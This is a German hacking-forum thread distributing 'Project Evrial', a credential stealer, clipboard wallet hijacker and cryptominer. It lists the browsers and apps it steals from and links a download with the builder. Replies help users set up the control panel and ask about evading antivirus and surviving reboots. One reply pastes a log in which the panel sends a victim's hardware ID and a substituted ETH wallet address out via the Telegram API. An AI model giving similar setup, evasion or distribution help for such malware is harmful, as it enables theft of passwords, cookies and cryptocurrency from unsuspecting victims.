Zum Inhalt wechseln

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

Project Evrial (Stealer + Cryptominer)

- - - - -

  • Bitte melde dich an um zu Antworten
11 Antworten in diesem Thema

#1
PaulaAbdul

PaulaAbdul

    Favoured Management

  • Administration
  • Likes
    3.341
  • 2.122 Beiträge
  • 2963 Bedankt
  • 1337-699
  • verifiziert
  • Android [root]
  • Windows, Linux

::
::

Project Evrial


wkmVWwM.png


Webpanel:


 

  Tool Beschreibung
Clipper
(ersetzt Wallet-IDs in der Zwischenablage)

  • BTC, LTC, MONERO, ETHEREUM
  • QIWI, WMR, WMZ, WME.
  • Steam Trade Offer Link

Stealer

  • Chromium (Passwords + Cookies)
  • Google Chrome (Passwords + Cookies)
  • Opera (Passwords + Cookies)
  • Kometa (Passwords + Cookies)
  • Amigo (Passwords + Cookies)
  • Torch (Passwords + Cookies)
  • Orbitum (Passwords + Cookies)
  • Comodo Dragon (Passwords + Cookies)
  • Yandex Browser (Passwords + Cookies)

Messenger

  • FileZilla
  • Pidgin

Dateien

  • .doc
  • .docx
  • .txt
  • .log


 

Please Login HERE or Register HERE to see this link!

boardvipdownload.png


Bearbeitet von PaulaAbdul, 05 Oktober 2018 - 00:31 Uhr.
Builder hinzugefügt

  • Ch!ller, gr33d und py-u gefällt das

VC0cXsp.gif

ho ho ho, it's magic...


Thanked by 5 Members:
Dean36 , s4m , 1x1 , py-u , Caruso

#2
gr33d

gr33d

    Pentester

  • Premium Member
  • Likes
    138
  • 125 Beiträge
  • 386 Bedankt
  • Android [root]
  • Windows, Linux

Danke für den share aber kann es sein, dass die Exe fehlt?



#3
smc2014

smc2014

    Moderator

  • Moderator
  • Likes
    339
  • 576 Beiträge
  • 232 Bedankt
  • Spender
  • Android [root]
  • Windows, Linux

Hallo,

 

NEIN, klick auf den DONWLOAD ICON

 

BR / LG



#4
Zerobyte

Zerobyte

    Script Kiddie

  • Premium Member
  • Likes
    34
  • 49 Beiträge
  • 110 Bedankt
  • Windows

Kann mir mal einer Bitte sagen was ich neben den DB daten noch in der config.php eintragen muss? Ich bekomme nur  diese Meldung Структура базы обновлена! Обновите страницу!.

 

Danke



#5
gr33d

gr33d

    Pentester

  • Premium Member
  • Likes
    138
  • 125 Beiträge
  • 386 Bedankt
  • Android [root]
  • Windows, Linux

Danke für den Tipp mit dem download aber wenn du den download link hier meinst hat es nicht geklappt. Muss man das über das panel machen? Weil da habe ich eigentlich keine solchen Funktionen gesehen. Im archiv war nur die mono.cecil.dll aber keine exe.



#6
Avni

Avni

    1337

  • Premium Member
  • Likes
    63
  • 352 Beiträge
  • 84 Bedankt
Du

Kann mir mal einer Bitte sagen was ich neben den DB daten noch in der config.php eintragen muss? Ich bekomme nur diese Meldung Структура базы обновлена! Обновите страницу!.

Danke

Die Seite einfach neu laden. Du musst nur aufpassen. Du wirst danach auf www.deinedomain.de/stealer/login.php weitereleitet. Ich hatte das panel in meine.de/www/stealer/ installiert und es funkionierte nicht.
Aber das mit der exe hab ich trozdem nicht verstanden Oo


Es fehlt einfach nur der Builder oO

Bearbeitet von Avni, 11 August 2018 - 19:06 Uhr.


#7
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    471
  • 495 Beiträge
  • 334 Bedankt

Du
Die Seite einfach neu laden. Du musst nur aufpassen. Du wirst danach auf www.deinedomain.de/stealer/login.php weitereleitet. Ich hatte das panel in meine.de/www/stealer/ installiert und es funkionierte nicht.
Aber das mit der exe hab ich trozdem nicht verstanden Oo


Es fehlt einfach nur der Builder oO

 

in der config.php DEFINE('site_dir','/stealer'); anpassen.



#8
py-u

py-u

    Leecher

  • Members
  • PIP
  • Likes
    0
  • 1 Beiträge
  • 0 Bedankt

habe das panel nach einigen problem aufgesetzt , musste die php dateien zu uft8 ohne bom kodieren. nun fehlt der loader oder bin ich blind?!



#9
Avni

Avni

    1337

  • Premium Member
  • Likes
    63
  • 352 Beiträge
  • 84 Bedankt
Nein der fehlt. Aber wenn du den Namen in Google eingeben findest es auf einigen anderen Boards Inklusion builder

#10
PaulaAbdul

PaulaAbdul

    Favoured Management

  • Administration
  • Likes
    3.341
  • 2.122 Beiträge
  • 2963 Bedankt
  • 1337-699
  • verifiziert
  • Android [root]
  • Windows, Linux

Sorry Jungs, habe es nochmal neu hochgeladen inklusive Builder ;)


  • hacked gefällt das

VC0cXsp.gif

ho ho ho, it's magic...


#11
s4m

s4m

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 6 Beiträge
  • 0 Bedankt

Nettes Tool! Hätte ein paar weiterführende Fragen:

 

1.) Ist es normal dass z.B. Avira direkt anschlägt, sobald ich mit der Maus über die generierte .exe fahre? Wenn ja, welche Änderungen müssten vorgenommen werden, sodass die .exe nicht direkt von jedem Antivirensystem erkannt wird? Veil Evasion der .exe, Encrypting, Hex-Editing, etc..?

 

2.) Angenommen man wolle den Clipper/Stealer "weiterentwickeln"/beschränken nur auf Crypto für mehr Coin-Adressen als nur 4 (BTC, ETH, XMR, LTC), was müsste man da genau beachten? Bin mir nicht sicher welche Algorithmen der Clipper benutzt, um BTC von ETH von XMR von LTC etc... zu unterscheiden.

 

3.) Das Power Panel läuft soweit top, nur sobald ich eine der 4 Coin-Adressen clippen möchte (BTC, ETH, XMR, LTC), clippt mir das Programm zusätzlich zu der neuen Coin-Adresse noch folgenden Rattenschwanz in den Paste dazu:

 


<!--zzz<!--]--><divstyle="text-align:center;font-size:11px"class="cbalink"><ahref=
"https: //www.zzz.com .ua/"title= "&#1073;&#1077;&#1089;&#1087;&#1083;&#1072;&#1090;&#1085;
&#1099;&#1081;&#1093;&#1086;&#1089;&#1090;&#1080;&#1085;&#1075;">&#1073;&#1077;&#1089;
&#1087;&#1083;&#1072;&#1090;&#1085;&#1099;&#1081;&#1093;&#1086;&#1089;&#1090;&#1080;&#1085;
&#1075;</a>ZZZ.COM.UA<br/><br/></div><scripttype="text/javascript"src="//a5.zzz.com.ua/r1.js">
</script><divclass="cumf_bt_form_wrapper"style="display:none"><formid="contact_us_mail_feedback"action="
/oldTi9QvqM6ytokU9Q8ylQq"method="post"><fieldset><!--FormName--><legend>ContactUs</legend>
<!--Textinput--><divclass="cumf_bt_form-group"><labelclass="col-md-4cumf_bt_control-label"for="cumf_bt_name"
>name</label><divclass="col-md-4"><inputid="cumf_bt_name"name="cumf_bt_name"type="text"placeholder="yourname"class=
"cumf_bt_form-controlcumf_bt_input-md"required/><spanclass="cumf_bt_help-block">Pleaseenteryourname</span></div></div>
<!--Textinput--><divclass="cumf_bt_form-group"><labelclass="col-md-4cumf_bt_control-label"for="cumf_bt_email"
>youremail</label><divclass="col-md-4"><inputid="cumf_bt_email"name="cumf_bt_email"type="text"placeholder=
"enteryouremail"class="cumf_bt_form-controlcumf_bt_input-md"required/><spanclass="cumf_bt_help-block"
>pleaseenteryouremail</span></div></div><!--Textarea--><divclass="cumf_bt_form-group"><labelclass=
"col-md-4cumf_bt_control-label"for="cumf_bt_message">yourmessage</label><divclass="col-md-4">
<textareaclass="cumf_bt_form-control"id="cumf_bt_message"name="cumf_bt_message">Messagegoeshere</textarea></div>
</div><inputtype="submit"id="cumf_bt_submit"value="Send"/></fieldset></form></div></body><!-->
 
(Paar Leerzeichen hab ich dazwischen gesetzt, sodass es nicht verlinkt)
 
Weiß wer was da falsch läuft? Wenn jemand plötzlich sowas aus seinem Paste raus erhält, weiß derjenige direkt dass da nicht alles korrekt laufen kann :D
 
Nutze als Host-Anbieter zzz.com.ua, wie es in einem xakfor.net Video gezeigt wurde.
 
Edit: Habe jetzt einen anderen Host hergenommen (runhosting), und mir wird wieder die Substitution nicht korrekt ausgegeben:
 
XXXXXXXXXX3<br/><b>Warning</b>:file_get_contents(https ://api.telegram.org/bot/sendmessage?chat_id=0&amp;text=%F0%9F%94%94+%D0%9E%D0%B1%D0%BD%D0%B0%D1%80%D1%83%D0%B6%D0%B5%D0%
BD%D1%8B+%D0%BD%D0%BE%D0%B2%D1%8B%D0%B5+%D0%B4%D0%B0%D0%BD%D0%BD%D1%8B%D0%B5+
D0%B2+%D0%B1%D1%83%D1%84%D0%B5%D1%80%D0%B5.%0A%0A%3Cb%3E%D0%A2%D0%B8%D0%BF+%D0%
BA%D0%BE%D1%88%D0%B5%D0%BB%D1%8C%D0%BA%D0%B0%3A%3C%2Fb%3E+ETH%0A%3Cb%3E%D0%97%
D0%BD%D0%B0%D1%87%D0%B5%D0%BD%D0%B8%D0%B5%3A%3C%2Fb%3E+0x9d281fEfE09159b39B859612Ba0F
d6f096aEc582%0A%3Cb%3EHwid%3A%3C%2Fb%3E+F517BE8560754FDD9F8C4F9C11392BAD%0A%0A%E2%9C%94+
%D0%92%D1%8B%D0%BF%D0%BE%D0%BB%D0%BD%D0%B5%D0%BD%D0%B0+%D0%B7%D0%B0%D0%BC%D0%
B5%D0%BD%D0%B0+ETH+%D1%81+%3Cb%3E0x9d281fEfE09159b39B859612Ba0Fd6f096aEc582%3C%2Fb%3E+%D0%
BD%D0%B0+%3Cb%3EXXXXXXXXXX3%3C%2Fb%3E&amp;parse_mode=HTML):failedtoopenstream:Networkisunreachablein
<b>/srv/disk8/2859522/www.[user].[host].com/shuffler.php</b>online<b>33</b><br/>
 
Ich hab wirklich keine Ahnung woran es liegen könnte, weshalb die Substitution mir stehts fehlerhaft ausgegeben wird.
 
4.) Wird nach dem Neustart des PCs das Programm wieder automatisch gestartet, oder muss es manuell wieder ausgeführt werden? Also ist es "immun" gegen PC-Reboots?
 
5.) Wenn ich mir die .zip generieren lasse, erhalte ich daraus einen Desktop Screenshot, "passwords", "files" und "cookies". Ist es normal dass die "passwords" Textdatei stets leerbleibt, oder sollte da eigentlich was geloggt werden? Hab mal auf xakfor.net nachgelesen, und es sei eventuell ein Problem mit Evrial selbst, dass keine Logs mehr mitgeschrieben werden.
 
 

Grüße und danke schonmal für eure Hilfe,

 

s4m


Bearbeitet von s4m, 23 Oktober 2018 - 14:33 Uhr.

Favorite Crypto Coins - XMR, HOT, NANO

 

Vitalik for President :D


#12
Sultan361

Sultan361

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 3 Beiträge
  • 0 Bedankt

Ein link ist leider down :(





  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen: 1

Mitglieder: 0, Gäste: 1, unsichtbare Mitglieder: 0

Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.